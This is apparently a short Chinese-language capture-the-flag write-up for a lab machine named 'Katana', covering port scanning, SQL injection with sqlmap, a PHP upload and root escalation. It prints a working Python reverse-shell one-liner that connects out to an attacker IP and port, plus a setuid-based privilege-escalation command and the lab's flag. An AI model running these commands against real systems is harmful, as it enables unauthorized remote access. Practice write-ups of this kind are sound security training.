# Katana [toc] --- ## 進入 先nmapscan    先去80那裡 就...一張圖片(別說還挺好看)  題外話結束,先gobuster啟動  到ebook找到了一個sqli的點 ```http://192.168.243.83/ebook/book.php?bookisbn=978-1-118-94924-5``` sqlmap--啟動   去翻admin(看起來就可疑)  好欸有密碼了 去登入看看 可以上傳檔案!!!  好吧不給傳  新增也不行  那只能繼續gobuster 然後 8088那裡有趣的出現了  upload.php/html 進去看看  好欸 上傳壞壞的php  但80和8088都沒有 然後我突然想到還有個8715 進去找路徑後發現可以!  好欸 直接reverse shell ``` export RHOST="192.168.45.167";export RPORT=4872;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")' ```  好欸 拿flag  ## 提權 下載linpeas.sh然後run 發現  爬了一下文後找到payload ```./python -c 'import os; os.setuid(0); os.system("/bin/sh")'```  成功 接著就是  flag```cbdab17e2513b3f9d6fdf5d01d0133ab``` flag的沒有格式阿阿阿阿阿
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up